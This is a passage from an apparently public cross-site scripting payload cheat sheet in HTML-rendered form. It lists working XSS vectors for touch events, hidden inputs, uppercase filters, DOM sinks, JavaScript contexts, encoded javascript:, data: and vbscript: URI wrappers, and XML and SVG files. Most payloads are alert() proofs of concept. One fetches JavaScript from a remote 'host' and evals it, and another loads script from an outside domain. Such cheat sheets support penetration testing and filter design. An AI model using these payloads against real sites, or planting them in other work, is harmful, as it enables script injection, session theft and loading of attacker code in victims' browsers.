<a id="__codelineno-9-14" name="__codelineno-9-14" href="#__codelineno-9-14"></a><span class="o">&lt;</span><span class="nx">body</span><span class="w"> </span><span class="nx">ontouchstart</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span><span class="w"> </span><span class="c1">// Triggers when a finger touch the screen</span>
<a id="__codelineno-9-15" name="__codelineno-9-15" href="#__codelineno-9-15"></a><span class="o">&lt;</span><span class="nx">body</span><span class="w"> </span><span class="nx">ontouchend</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span><span class="w"> </span><span class="c1">// Triggers when a finger is removed from touch screen</span>
<a id="__codelineno-9-16" name="__codelineno-9-16" href="#__codelineno-9-16"></a><span class="o">&lt;</span><span class="nx">body</span><span class="w"> </span><span class="nx">ontouchmove</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span><span class="w"> </span><span class="c1">// When a finger is dragged across the screen.</span>
</code></pre></div>
<h3 id="xss-using-a-remote-js">XSS using a remote JS</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-10-1" name="__codelineno-10-1" href="#__codelineno-10-1"></a><span class="p">&lt;</span><span class="nt">svg</span><span class="err">/</span><span class="na">onload</span><span class="o">=</span><span class="s">&#39;fetch(&quot;//host/a&quot;).then(r=&gt;r.text().then(t=&gt;eval(t)))&#39;</span><span class="p">&gt;</span>
<a id="__codelineno-10-2" name="__codelineno-10-2" href="#__codelineno-10-2"></a><span class="p">&lt;</span><span class="nt">script</span> <span class="na">src</span><span class="o">=</span><span class="s">14.rs</span><span class="p">&gt;</span>
<a id="__codelineno-10-3" name="__codelineno-10-3" href="#__codelineno-10-3"></a><span class="c1">// you can also specify an arbitrary payload with 14.rs/#payload</span>
<a id="__codelineno-10-4" name="__codelineno-10-4" href="#__codelineno-10-4"></a>e.g: 14.rs/#alert(document.domain)
</code></pre></div>
<h3 id="xss-in-hidden-input">XSS in Hidden Input</h3>
<p><div class="highlight"><pre><span></span><code><a id="__codelineno-11-1" name="__codelineno-11-1" href="#__codelineno-11-1"></a><span class="o">&lt;</span><span class="nx">input</span><span class="w"> </span><span class="nx">type</span><span class="o">=</span><span class="s2">&quot;hidden&quot;</span><span class="w"> </span><span class="nx">accesskey</span><span class="o">=</span><span class="s2">&quot;X&quot;</span><span class="w"> </span><span class="nx">onclick</span><span class="o">=</span><span class="s2">&quot;alert(1)&quot;</span><span class="o">&gt;</span>
<a id="__codelineno-11-2" name="__codelineno-11-2" href="#__codelineno-11-2"></a><span class="nx">Use</span><span class="w"> </span><span class="nx">CTRL</span><span class="o">+</span><span class="nx">SHIFT</span><span class="o">+</span><span class="nx">X</span><span class="w"> </span><span class="nx">to</span><span class="w"> </span><span class="nx">trigger</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="nx">onclick</span><span class="w"> </span><span class="nx">event</span>
</code></pre></div>
in newer browsers : firefox-130/chrome-108
<div class="highlight"><pre><span></span><code><a id="__codelineno-12-1" name="__codelineno-12-1" href="#__codelineno-12-1"></a><span class="o">&lt;</span><span class="nx">input</span><span class="w"> </span><span class="nx">type</span><span class="o">=</span><span class="s2">&quot;hidden&quot;</span><span class="w"> </span><span class="nx">oncontentvisibilityautostatechange</span><span class="o">=</span><span class="s2">&quot;alert(1)&quot;</span><span class="w"> </span><span class="nx">style</span><span class="o">=</span><span class="s2">&quot;content-visibility:auto&quot;</span><span class="w"> </span><span class="o">&gt;</span>
</code></pre></div></p>
<h3 id="xss-in-uppercase-output">XSS in Uppercase Output</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-13-1" name="__codelineno-13-1" href="#__codelineno-13-1"></a><span class="o">&lt;</span><span class="nx">IMG</span><span class="w"> </span><span class="nx">SRC</span><span class="o">=</span><span class="mf">1</span><span class="w"> </span><span class="nx">ONERROR</span><span class="o">=&amp;</span><span class="n">#X61</span><span class="p">;</span><span class="o">&amp;</span><span class="n">#X6C</span><span class="p">;</span><span class="o">&amp;</span><span class="n">#X65</span><span class="p">;</span><span class="o">&amp;</span><span class="n">#X72</span><span class="p">;</span><span class="o">&amp;</span><span class="n">#X74</span><span class="p">;(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span>
</code></pre></div>
<h3 id="dom-based-xss">DOM Based XSS</h3>
<p>Based on a DOM XSS sink.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-14-1" name="__codelineno-14-1" href="#__codelineno-14-1"></a><span class="err">#&quot;</span><span class="o">&gt;&lt;</span><span class="nx">img</span><span class="w"> </span><span class="nx">src</span><span class="o">=</span><span class="err">/ onerror=alert(2)&gt;</span>
</code></pre></div>
<h3 id="xss-in-js-context">XSS in JS Context</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-15-1" name="__codelineno-15-1" href="#__codelineno-15-1"></a><span class="o">-</span><span class="p">(</span><span class="nx">confirm</span><span class="p">)(</span><span class="nb">document</span><span class="p">.</span><span class="nx">domain</span><span class="p">)</span><span class="c1">//</span>
<a id="__codelineno-15-2" name="__codelineno-15-2" href="#__codelineno-15-2"></a><span class="p">;</span><span class="w"> </span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">);</span><span class="c1">//</span>
<a id="__codelineno-15-3" name="__codelineno-15-3" href="#__codelineno-15-3"></a><span class="c1">// (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic)</span>
</code></pre></div>
<h2 id="xss-in-wrappers-for-uri">XSS in Wrappers for URI</h2>
<h3 id="wrapper-javascript">Wrapper javascript</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-16-1" name="__codelineno-16-1" href="#__codelineno-16-1"></a><span class="nx">javascript</span><span class="o">:</span><span class="nx">prompt</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span>
<a id="__codelineno-16-2" name="__codelineno-16-2" href="#__codelineno-16-2"></a>
<a id="__codelineno-16-3" name="__codelineno-16-3" href="#__codelineno-16-3"></a><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23106</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">2397</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23118</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">2397</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23115</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">2399</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23114</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23105</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23112</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23116</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">2358</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">2399</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23111</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23110</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23102</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23105</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23114</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23109</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">2340</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">2349</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">2341</span>
<a id="__codelineno-16-4" name="__codelineno-16-4" href="#__codelineno-16-4"></a>
<a id="__codelineno-16-5" name="__codelineno-16-5" href="#__codelineno-16-5"></a><span class="o">&amp;</span><span class="err">#</span><span class="mf">106</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">97</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">118</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">97</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">115</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">99</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">114</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">105</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">112</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">116</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">58</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">99</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">111</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">110</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">102</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">105</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">114</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">109</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">40</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">49</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">41</span>
<a id="__codelineno-16-6" name="__codelineno-16-6" href="#__codelineno-16-6"></a>
<a id="__codelineno-16-7" name="__codelineno-16-7" href="#__codelineno-16-7"></a><span class="nx">We</span><span class="w"> </span><span class="nx">can</span><span class="w"> </span><span class="nx">encode</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="s2">&quot;javascript:&quot;</span><span class="w"> </span><span class="ow">in</span><span class="w"> </span><span class="nx">Hex</span><span class="o">/</span><span class="nx">Octal</span>
<a id="__codelineno-16-8" name="__codelineno-16-8" href="#__codelineno-16-8"></a><span class="err">\</span><span class="nx">x6A</span><span class="err">\</span><span class="nx">x61</span><span class="err">\</span><span class="nx">x76</span><span class="err">\</span><span class="nx">x61</span><span class="err">\</span><span class="nx">x73</span><span class="err">\</span><span class="nx">x63</span><span class="err">\</span><span class="nx">x72</span><span class="err">\</span><span class="nx">x69</span><span class="err">\</span><span class="nx">x70</span><span class="err">\</span><span class="nx">x74</span><span class="err">\</span><span class="nx">x3aalert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span>
<a id="__codelineno-16-9" name="__codelineno-16-9" href="#__codelineno-16-9"></a><span class="nx">\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span>
<a id="__codelineno-16-10" name="__codelineno-16-10" href="#__codelineno-16-10"></a><span class="err">\</span><span class="mf">152</span><span class="err">\</span><span class="mf">141</span><span class="err">\</span><span class="mf">166</span><span class="err">\</span><span class="mf">141</span><span class="err">\</span><span class="mf">163</span><span class="err">\</span><span class="mf">143</span><span class="err">\</span><span class="mf">162</span><span class="err">\</span><span class="mf">151</span><span class="err">\</span><span class="mf">160</span><span class="err">\</span><span class="mf">164</span><span class="err">\</span><span class="mo">072</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span>
<a id="__codelineno-16-11" name="__codelineno-16-11" href="#__codelineno-16-11"></a>
<a id="__codelineno-16-12" name="__codelineno-16-12" href="#__codelineno-16-12"></a><span class="nx">We</span><span class="w"> </span><span class="nx">can</span><span class="w"> </span><span class="nx">use</span><span class="w"> </span><span class="nx">a</span><span class="w"> </span><span class="s1">&#39;newline character&#39;</span>
<a id="__codelineno-16-13" name="__codelineno-16-13" href="#__codelineno-16-13"></a><span class="nx">java</span><span class="o">%</span><span class="mf">0</span><span class="nx">ascript</span><span class="o">:</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="nx">LF</span><span class="w"> </span><span class="p">(</span><span class="err">\</span><span class="nx">n</span><span class="p">)</span>
<a id="__codelineno-16-14" name="__codelineno-16-14" href="#__codelineno-16-14"></a><span class="nx">java</span><span class="o">%</span><span class="mf">09</span><span class="nx">script</span><span class="o">:</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="nx">Horizontal</span><span class="w"> </span><span class="nx">tab</span><span class="w"> </span><span class="p">(</span><span class="err">\</span><span class="nx">t</span><span class="p">)</span>
<a id="__codelineno-16-15" name="__codelineno-16-15" href="#__codelineno-16-15"></a><span class="nx">java</span><span class="o">%</span><span class="mf">0</span><span class="nx">dscript</span><span class="o">:</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="nx">CR</span><span class="w"> </span><span class="p">(</span><span class="err">\</span><span class="nx">r</span><span class="p">)</span>
<a id="__codelineno-16-16" name="__codelineno-16-16" href="#__codelineno-16-16"></a>
<a id="__codelineno-16-17" name="__codelineno-16-17" href="#__codelineno-16-17"></a><span class="nx">Using</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="nx">escape</span><span class="w"> </span><span class="nx">character</span>
<a id="__codelineno-16-18" name="__codelineno-16-18" href="#__codelineno-16-18"></a><span class="err">\</span><span class="nx">j</span><span class="err">\</span><span class="nx">av</span><span class="err">\</span><span class="nx">a</span><span class="err">\</span><span class="nx">s</span><span class="err">\</span><span class="nx">cr</span><span class="err">\</span><span class="nx">i</span><span class="err">\</span><span class="nx">pt</span><span class="err">\</span><span class="o">:</span><span class="err">\</span><span class="nx">a</span><span class="err">\</span><span class="nx">l</span><span class="err">\</span><span class="nx">ert</span><span class="err">\</span><span class="p">(</span><span class="mf">1</span><span class="err">\</span><span class="p">)</span>
<a id="__codelineno-16-19" name="__codelineno-16-19" href="#__codelineno-16-19"></a>
<a id="__codelineno-16-20" name="__codelineno-16-20" href="#__codelineno-16-20"></a><span class="nx">Using</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="nx">newline</span><span class="w"> </span><span class="nx">and</span><span class="w"> </span><span class="nx">a</span><span class="w"> </span><span class="nx">comment</span><span class="w"> </span><span class="c1">//</span>
<a id="__codelineno-16-21" name="__codelineno-16-21" href="#__codelineno-16-21"></a><span class="nx">javascript</span><span class="o">:</span><span class="c1">//%0Aalert(1)</span>
<a id="__codelineno-16-22" name="__codelineno-16-22" href="#__codelineno-16-22"></a><span class="nx">javascript</span><span class="o">:</span><span class="c1">//anything%0D%0A%0D%0Awindow.alert(1)</span>
</code></pre></div>
<h3 id="wrapper-data">Wrapper data</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-17-1" name="__codelineno-17-1" href="#__codelineno-17-1"></a><span class="nx">data</span><span class="o">:</span><span class="nx">text</span><span class="o">/</span><span class="nx">html</span><span class="p">,</span><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nx">alert</span><span class="p">(</span><span class="mf">0</span><span class="p">)</span><span class="o">&lt;</span><span class="err">/script&gt;</span>
<a id="__codelineno-17-2" name="__codelineno-17-2" href="#__codelineno-17-2"></a><span class="nx">data</span><span class="o">:</span><span class="nx">text</span><span class="o">/</span><span class="nx">html</span><span class="p">;</span><span class="nx">base64</span><span class="p">,</span><span class="nx">PHN2Zy9vbmxvYWQ9YWxlcnQoMik</span><span class="o">+</span>
<a id="__codelineno-17-3" name="__codelineno-17-3" href="#__codelineno-17-3"></a><span class="o">&lt;</span><span class="nx">script</span><span class="w"> </span><span class="nx">src</span><span class="o">=</span><span class="s2">&quot;data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==&quot;</span><span class="o">&gt;&lt;</span><span class="err">/script&gt;</span>
</code></pre></div>
<h3 id="wrapper-vbscript">Wrapper vbscript</h3>
<p>only IE</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-18-1" name="__codelineno-18-1" href="#__codelineno-18-1"></a><span class="nx">vbscript</span><span class="o">:</span><span class="nx">msgbox</span><span class="p">(</span><span class="s2">&quot;XSS&quot;</span><span class="p">)</span>
</code></pre></div>
<h2 id="xss-in-files">XSS in Files</h2>
<p><strong>NOTE:</strong> The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-19-1" name="__codelineno-19-1" href="#__codelineno-19-1"></a><span class="nt">&lt;name&gt;</span>
<a id="__codelineno-19-2" name="__codelineno-19-2" href="#__codelineno-19-2"></a><span class="w"> </span><span class="nt">&lt;value&gt;</span><span class="cp">&lt;![CDATA[&lt;script&gt;confirm(document.domain)&lt;/script&gt;]]&gt;</span><span class="nt">&lt;/value&gt;</span>
<a id="__codelineno-19-3" name="__codelineno-19-3" href="#__codelineno-19-3"></a><span class="nt">&lt;/name&gt;</span>
</code></pre></div>
<h3 id="xss-in-xml">XSS in XML</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-20-1" name="__codelineno-20-1" href="#__codelineno-20-1"></a><span class="nt">&lt;html&gt;</span>
<a id="__codelineno-20-2" name="__codelineno-20-2" href="#__codelineno-20-2"></a><span class="nt">&lt;head&gt;&lt;/head&gt;</span>
<a id="__codelineno-20-3" name="__codelineno-20-3" href="#__codelineno-20-3"></a><span class="nt">&lt;body&gt;</span>
<a id="__codelineno-20-4" name="__codelineno-20-4" href="#__codelineno-20-4"></a><span class="nt">&lt;something:script</span><span class="w"> </span><span class="na">xmlns:something=</span><span class="s">&quot;http://www.w3.org/1999/xhtml&quot;</span><span class="nt">&gt;</span>alert(1)<span class="nt">&lt;/something:script&gt;</span>
<a id="__codelineno-20-5" name="__codelineno-20-5" href="#__codelineno-20-5"></a><span class="nt">&lt;/body&gt;</span>
<a id="__codelineno-20-6" name="__codelineno-20-6" href="#__codelineno-20-6"></a><span class="nt">&lt;/html&gt;</span>
</code></pre></div>
<h3 id="xss-in-svg">XSS in SVG</h3>
<p>Simple script. Codename: green triangle</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-21-1" name="__codelineno-21-1" href="#__codelineno-21-1"></a><span class="cp">&lt;?xml version=&quot;1.0&quot; standalone=&quot;no&quot;?&gt;</span>
<a id="__codelineno-21-2" name="__codelineno-21-2" href="#__codelineno-21-2"></a><span class="cp">&lt;!DOCTYPE svg PUBLIC &quot;-//W3C//DTD SVG 1.1//EN&quot; &quot;http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd&quot;&gt;</span>
<a id="__codelineno-21-3" name="__codelineno-21-3" href="#__codelineno-21-3"></a>
<a id="__codelineno-21-4" name="__codelineno-21-4" href="#__codelineno-21-4"></a><span class="nt">&lt;svg</span><span class="w"> </span><span class="na">version=</span><span class="s">&quot;1.1&quot;</span><span class="w"> </span><span class="na">baseProfile=</span><span class="s">&quot;full&quot;</span><span class="w"> </span><span class="na">xmlns=</span><span class="s">&quot;http://www.w3.org/2000/svg&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-21-5" name="__codelineno-21-5" href="#__codelineno-21-5"></a><span class="w"> </span><span class="nt">&lt;polygon</span><span class="w"> </span><span class="na">id=</span><span class="s">&quot;triangle&quot;</span><span class="w"> </span><span class="na">points=</span><span class="s">&quot;0,0 0,50 50,0&quot;</span><span class="w"> </span><span class="na">fill=</span><span class="s">&quot;#009900&quot;</span><span class="w"> </span><span class="na">stroke=</span><span class="s">&quot;#004400&quot;</span><span class="nt">/&gt;</span>
<a id="__codelineno-21-6" name="__codelineno-21-6" href="#__codelineno-21-6"></a><span class="w"> </span><span class="nt">&lt;script</span><span class="w"> </span><span class="na">type=</span><span class="s">&quot;text/javascript&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-21-7" name="__codelineno-21-7" href="#__codelineno-21-7"></a><span class="w"> </span>alert(document.domain);
<a id="__codelineno-21-8" name="__codelineno-21-8" href="#__codelineno-21-8"></a><span class="w"> </span><span class="nt">&lt;/script&gt;</span>
<a id="__codelineno-21-9" name="__codelineno-21-9" href="#__codelineno-21-9"></a><span class="nt">&lt;/svg&gt;</span>
</code></pre></div>
<p>More comprehensive payload with svg tag attribute, desc script, foreignObject script, foreignObject iframe, title script, animatetransform event and simple script. Codename: red ligthning. Author: noraj.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-22-1" name="__codelineno-22-1" href="#__codelineno-22-1"></a><span class="cp">&lt;?xml version=&quot;1.0&quot; standalone=&quot;no&quot;?&gt;</span>
<a id="__codelineno-22-2" name="__codelineno-22-2" href="#__codelineno-22-2"></a><span class="cp">&lt;!DOCTYPE svg PUBLIC &quot;-//W3C//DTD SVG 1.1//EN&quot; &quot;http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd&quot;&gt;</span>
<a id="__codelineno-22-3" name="__codelineno-22-3" href="#__codelineno-22-3"></a>
<a id="__codelineno-22-4" name="__codelineno-22-4" href="#__codelineno-22-4"></a><span class="nt">&lt;svg</span><span class="w"> </span><span class="na">version=</span><span class="s">&quot;1.1&quot;</span><span class="w"> </span><span class="na">baseProfile=</span><span class="s">&quot;full&quot;</span><span class="w"> </span><span class="na">width=</span><span class="s">&quot;100&quot;</span><span class="w"> </span><span class="na">height=</span><span class="s">&quot;100&quot;</span><span class="w"> </span><span class="na">xmlns=</span><span class="s">&quot;http://www.w3.org/2000/svg&quot;</span><span class="w"> </span><span class="na">onload=</span><span class="s">&quot;alert(&#39;svg attribut&#39;)&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-22-5" name="__codelineno-22-5" href="#__codelineno-22-5"></a><span class="w"> </span><span class="nt">&lt;polygon</span><span class="w"> </span><span class="na">id=</span><span class="s">&quot;lightning&quot;</span><span class="w"> </span><span class="na">points=</span><span class="s">&quot;0,100 50,25 50,75 100,0&quot;</span><span class="w"> </span><span class="na">fill=</span><span class="s">&quot;#ff1919&quot;</span><span class="w"> </span><span class="na">stroke=</span><span class="s">&quot;#ff0000&quot;</span><span class="nt">/&gt;</span>
<a id="__codelineno-22-6" name="__codelineno-22-6" href="#__codelineno-22-6"></a><span class="w"> </span><span class="nt">&lt;desc&gt;&lt;script&gt;</span>alert(&#39;svg<span class="w"> </span>desc&#39;)<span class="nt">&lt;/script&gt;&lt;/desc&gt;</span>
<a id="__codelineno-22-7" name="__codelineno-22-7" href="#__codelineno-22-7"></a><span class="w"> </span><span class="nt">&lt;foreignObject&gt;&lt;script&gt;</span>alert(&#39;svg<span class="w"> </span>foreignObject&#39;)<span class="nt">&lt;/script&gt;&lt;/foreignObject&gt;</span>
<a id="__codelineno-22-8" name="__codelineno-22-8" href="#__codelineno-22-8"></a><span class="w"> </span><span class="nt">&lt;foreignObject</span><span class="w"> </span><span class="na">width=</span><span class="s">&quot;500&quot;</span><span class="w"> </span><span class="na">height=</span><span class="s">&quot;500&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-22-9" name="__codelineno-22-9" href="#__codelineno-22-9"></a><span class="w"> </span><span class="nt">&lt;iframe</span><span class="w"> </span><span class="na">xmlns=</span><span class="s">&quot;http://www.w3.org/1999/xhtml&quot;</span><span class="w"> </span><span class="na">src=</span><span class="s">&quot;javascript:alert(&#39;svg foreignObject iframe&#39;);&quot;</span><span class="w"> </span><span class="na">width=</span><span class="s">&quot;400&quot;</span><span class="w"> </span><span class="na">height=</span><span class="s">&quot;250&quot;</span><span class="nt">/&gt;</span>
<a id="__codelineno-22-10" name="__codelineno-22-10" href="#__codelineno-22-10"></a><span class="w"> </span><span class="nt">&lt;/foreignObject&gt;</span>
<a id="__codelineno-22-11" name="__codelineno-22-11" href="#__codelineno-22-11"></a><span class="w"> </span><span class="nt">&lt;title&gt;&lt;script&gt;</span>alert(&#39;svg<span class="w"> </span>title&#39;)<span class="nt">&lt;/script&gt;&lt;/title&gt;</span>
<a id="__codelineno-22-12" name="__codelineno-22-12" href="#__codelineno-22-12"></a><span class="w"> </span><span class="nt">&lt;animatetransform</span><span class="w"> </span><span class="na">onbegin=</span><span class="s">&quot;alert(&#39;svg animatetransform onbegin&#39;)&quot;</span><span class="nt">&gt;&lt;/animatetransform&gt;</span>
<a id="__codelineno-22-13" name="__codelineno-22-13" href="#__codelineno-22-13"></a><span class="w"> </span><span class="nt">&lt;script</span><span class="w"> </span><span class="na">type=</span><span class="s">&quot;text/javascript&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-22-14" name="__codelineno-22-14" href="#__codelineno-22-14"></a><span class="w"> </span>alert(&#39;svg<span class="w"> </span>script&#39;);
<a id="__codelineno-22-15" name="__codelineno-22-15" href="#__codelineno-22-15"></a><span class="w"> </span><span class="nt">&lt;/script&gt;</span>
<a id="__codelineno-22-16" name="__codelineno-22-16" href="#__codelineno-22-16"></a><span class="nt">&lt;/svg&gt;</span>
</code></pre></div>
<h4 id="short-svg-payload">Short SVG Payload</h4>
<div class="highlight"><pre><span></span><code><a id="__codelineno-23-1" name="__codelineno-23-1" href="#__codelineno-23-1"></a><span class="o">&lt;</span><span class="nx">svg</span><span class="w"> </span><span class="nx">xmlns</span><span class="o">=</span><span class="s2">&quot;http://www.w3.org/2000/svg&quot;</span><span class="w"> </span><span class="nx">onload</span><span class="o">=</span><span class="s2">&quot;alert(document.domain)&quot;</span><span class="o">/&gt;</span>
<a id="__codelineno-23-2" name="__codelineno-23-2" href="#__codelineno-23-2"></a>
<a id="__codelineno-23-3" name="__codelineno-23-3" href="#__codelineno-23-3"></a><span class="o">&lt;</span><span class="nx">svg</span><span class="o">&gt;&lt;</span><span class="nx">desc</span><span class="o">&gt;&lt;!</span><span class="p">[</span><span class="nx">CDATA</span><span class="p">[</span><span class="o">&lt;</span><span class="err">/desc&gt;&lt;script&gt;alert(1)&lt;/script&gt;]]&gt;&lt;/svg&gt;</span>
<a id="__codelineno-23-4" name="__codelineno-23-4" href="#__codelineno-23-4"></a><span class="o">&lt;</span><span class="nx">svg</span><span class="o">&gt;&lt;</span><span class="nx">foreignObject</span><span class="o">&gt;&lt;!</span><span class="p">[</span><span class="nx">CDATA</span><span class="p">[</span><span class="o">&lt;</span><span class="err">/foreignObject&gt;&lt;script&gt;alert(2)&lt;/script&gt;]]&gt;&lt;/svg&gt;</span>
<a id="__codelineno-23-5" name="__codelineno-23-5" href="#__codelineno-23-5"></a><span class="o">&lt;</span><span class="nx">svg</span><span class="o">&gt;&lt;</span><span class="nx">title</span><span class="o">&gt;&lt;!</span><span class="p">[</span><span class="nx">CDATA</span><span class="p">[</span><span class="o">&lt;</span><span class="err">/title&gt;&lt;script&gt;alert(3)&lt;/script&gt;]]&gt;&lt;/svg&gt;</span>
</code></pre></div>
<h3 id="nesting-svg-and-xss">Nesting SVG and XSS</h3>
<p>Including a remote SVG image in a SVG works but won't trigger the XSS embedded in the remote SVG. Author: noraj.</p>
<p>SVG 1.x (xlink:href)</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-24-1" name="__codelineno-24-1" href="#__codelineno-24-1"></a><span class="nt">&lt;svg</span><span class="w"> </span><span class="na">width=</span><span class="s">&quot;200&quot;</span><span class="w"> </span><span class="na">height=</span><span class="s">&quot;200&quot;</span><span class="w"> </span><span class="na">xmlns=</span><span class="s">&quot;http://www.w3.org/2000/svg&quot;</span><span class="w"> </span><span class="na">xmlns:xlink=</span><span class="s">&quot;http://www.w3.org/1999/xlink&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-24-2" name="__codelineno-24-2" href="#__codelineno-24-2"></a><span class="w"> </span><span class="nt">&lt;image</span><span class="w"> </span><span class="na">xlink:href=</span><span class="s">&quot;http://127.0.0.1:9999/red_lightning_xss_full.svg&quot;</span><span class="w"> </span><span class="na">height=</span><span class="s">&quot;200&quot;</span><span class="w"> </span><span class="na">width=</span><span class="s">&quot;200&quot;</span><span class="nt">/&gt;</span>
<a id="__codelineno-24-3" name="__codelineno-24-3" href="#__codelineno-24-3"></a><span class="nt">&lt;/svg&gt;</span>
</code></pre></div>
<p>Including a remote SVG fragment in a SVG works but won't trigger the XSS embedded in the remote SVG element because it's impossible to add vulnerable attribute on a polygon/rect/etc since the <code>style</code> attribute is no longer a vector on modern browsers. Author: noraj.</p>
<p>SVG 1.x (xlink:href)</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-25-1" name="__codelineno-25-1" href="#__codelineno-25-1"></a><span class="nt">&lt;svg</span><span class="w"> </span><span class="na">width=</span><span class="s">&quot;200&quot;</span><span class="w"> </span><span class="na">height=</span><span class="s">&quot;200&quot;</span><span class="w"> </span><span class="na">xmlns=</span><span class="s">&quot;http://www.w3.org/2000/svg&quot;</span><span class="w"> </span><span class="na">xmlns:xlink=</span><span class="s">&quot;http://www.w3.org/1999/xlink&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-25-2" name="__codelineno-25-2" href="#__codelineno-25-2"></a><span class="w"> </span><span class="nt">&lt;use</span><span class="w"> </span><span class="na">xlink:href=</span><span class="s">&quot;http://127.0.0.1:9999/red_lightning_xss_full.svg#lightning&quot;</span><span class="nt">/&gt;</span>
<a id="__codelineno-25-3" name="__codelineno-25-3" href="#__codelineno-25-3"></a><span class="nt">&lt;/svg&gt;</span>
</code></pre></div>
<p>However, including svg tags in SVG documents works and allows XSS execution from sub-SVGs. Codename: french flag. Author: noraj.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-26-1" name="__codelineno-26-1" href="#__codelineno-26-1"></a><span class="nt">&lt;svg</span><span class="w"> </span><span class="na">xmlns=</span><span class="s">&quot;http://www.w3.org/2000/svg&quot;</span><span class="w"> </span><span class="na">xmlns:xlink=</span><span class="s">&quot;http://www.w3.org/1999/xlink&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-26-2" name="__codelineno-26-2" href="#__codelineno-26-2"></a><span class="w"> </span><span class="nt">&lt;svg</span><span class="w"> </span><span class="na">x=</span><span class="s">&quot;10&quot;</span><span class="nt">&gt;</span>
